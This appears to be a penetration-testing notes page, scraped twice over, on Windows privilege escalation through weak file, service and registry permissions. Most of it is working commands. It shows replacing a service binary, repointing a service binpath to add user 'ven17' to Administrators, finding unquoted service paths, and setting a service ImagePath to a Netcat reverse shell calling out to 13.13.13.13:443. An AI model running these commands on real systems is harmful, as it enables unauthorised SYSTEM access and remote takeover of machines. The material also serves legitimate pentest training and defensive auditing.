Weak Permissions

Here would be an examples of weak permissions abuse

Permissive File System ACLs

Running SharpUp

Tool: SharpUp from GhostPack to check for weak ACLs.

PS C:\> .\SharpUp.exe audit

Example vulnerable service:
- Name: SecurityService
- Path: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Checking Permissions with `icacls`

PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Output shows Everyone and BUILTIN\Users have Full Control.

Replacing Service Binary with malicious one

C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService

Replace with a malicious binary to gain SYSTEM privileges.

Weak Service Permissions

Checking Modifiable Services with SharpUp

C:\> SharpUp.exe audit

Example vulnerable service:
- Name: WindscribeService
- Path: "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Checking Permissions with `accesschk`

C:\> accesschk.exe /accepteula -quvcw WindscribeService

NT AUTHORITY\Authenticated Users has SERVICE_ALL_ACCESS (full control).

Changing the Service Binary Path

C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"

Grants user ven17 administrator rights.

Stopping & Starting the Service

C:\> sc stop WindscribeService
C:\> sc start WindscribeService

Executes the new binary path.

Confirming Privilege Escalation

C:\> net localgroup administrators

Verify if ven17 was added to the Administrators group.

Resetting the Binary Path (Cleanup)

C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService

Unquoted Service Path

If a service binary path is not enclosed in quotes, Windows may execute unintended binaries.

Example vulnerable service:

C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

Windows may execute:
- C:\Program.exe
- C:\Program Files\System.exe

Finding Unquoted Service Paths

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services

Example vulnerable service: ModelManagerService
Allows modification of the ImagePath.

Changing `ImagePath` with PowerShell

PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"

Executes Netcat shell upon service start.

Modifiable Registry Autorun Binaries

Checking Startup Programs

PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

If the attacker can modify a startup binary, they can execute malicious code on user login.

PreviousUser-Interaction Attacks NextTheory

Weak Permissions

Here would be an examples of weak permissions abuse

Permissive File System ACLs

Running SharpUp

Tool: SharpUp from GhostPack to check for weak ACLs.

PS C:\> .\SharpUp.exe audit

Example vulnerable service:
- Name: SecurityService
- Path: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Checking Permissions with `icacls`

PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Output shows Everyone and BUILTIN\Users have Full Control.

Replacing Service Binary with malicious one

C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService

Replace with a malicious binary to gain SYSTEM privileges.

Weak Service Permissions

Checking Modifiable Services with SharpUp

C:\> SharpUp.exe audit

Example vulnerable service:
- Name: WindscribeService
- Path: "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Checking Permissions with `accesschk`

C:\> accesschk.exe /accepteula -quvcw WindscribeService

NT AUTHORITY\Authenticated Users has SERVICE_ALL_ACCESS (full control).

Changing the Service Binary Path

C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"

Grants user ven17 administrator rights.

Stopping & Starting the Service

C:\> sc stop WindscribeService
C:\> sc start WindscribeService

Executes the new binary path.

Confirming Privilege Escalation

C:\> net localgroup administrators

Verify if ven17 was added to the Administrators group.

Resetting the Binary Path (Cleanup)

C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService

Unquoted Service Path

If a service binary path is not enclosed in quotes, Windows may execute unintended binaries.

Example vulnerable service:

C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

Windows may execute:
- C:\Program.exe
- C:\Program Files\System.exe

Finding Unquoted Service Paths

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services

Example vulnerable service: ModelManagerService
Allows modification of the ImagePath.

Changing `ImagePath` with PowerShell

PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"

Executes Netcat shell upon service start.

Modifiable Registry Autorun Binaries

Checking Startup Programs

PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

If the attacker can modify a startup binary, they can execute malicious code on user login.

PreviousUser-Interaction Attacks NextTheory

Permissive File System ACLs

Running SharpUp

Checking Permissions with icacls

Replacing Service Binary with malicious one

Weak Service Permissions

Checking Modifiable Services with SharpUp

Checking Permissions with accesschk

Changing the Service Binary Path

Stopping & Starting the Service

Confirming Privilege Escalation

Resetting the Binary Path (Cleanup)

Unquoted Service Path

Finding Unquoted Service Paths

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

Changing ImagePath with PowerShell

Modifiable Registry Autorun Binaries

Checking Startup Programs

Permissive File System ACLs

Running SharpUp

Checking Permissions with icacls

Replacing Service Binary with malicious one

Weak Service Permissions

Checking Modifiable Services with SharpUp

Checking Permissions with accesschk

Changing the Service Binary Path

Stopping & Starting the Service

Confirming Privilege Escalation

Resetting the Binary Path (Cleanup)

Unquoted Service Path

Finding Unquoted Service Paths

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

Changing ImagePath with PowerShell

Modifiable Registry Autorun Binaries

Checking Startup Programs

Checking Permissions with `icacls`

Checking Permissions with `accesschk`

Changing `ImagePath` with PowerShell

Checking Permissions with `icacls`

Checking Permissions with `accesschk`

Changing `ImagePath` with PowerShell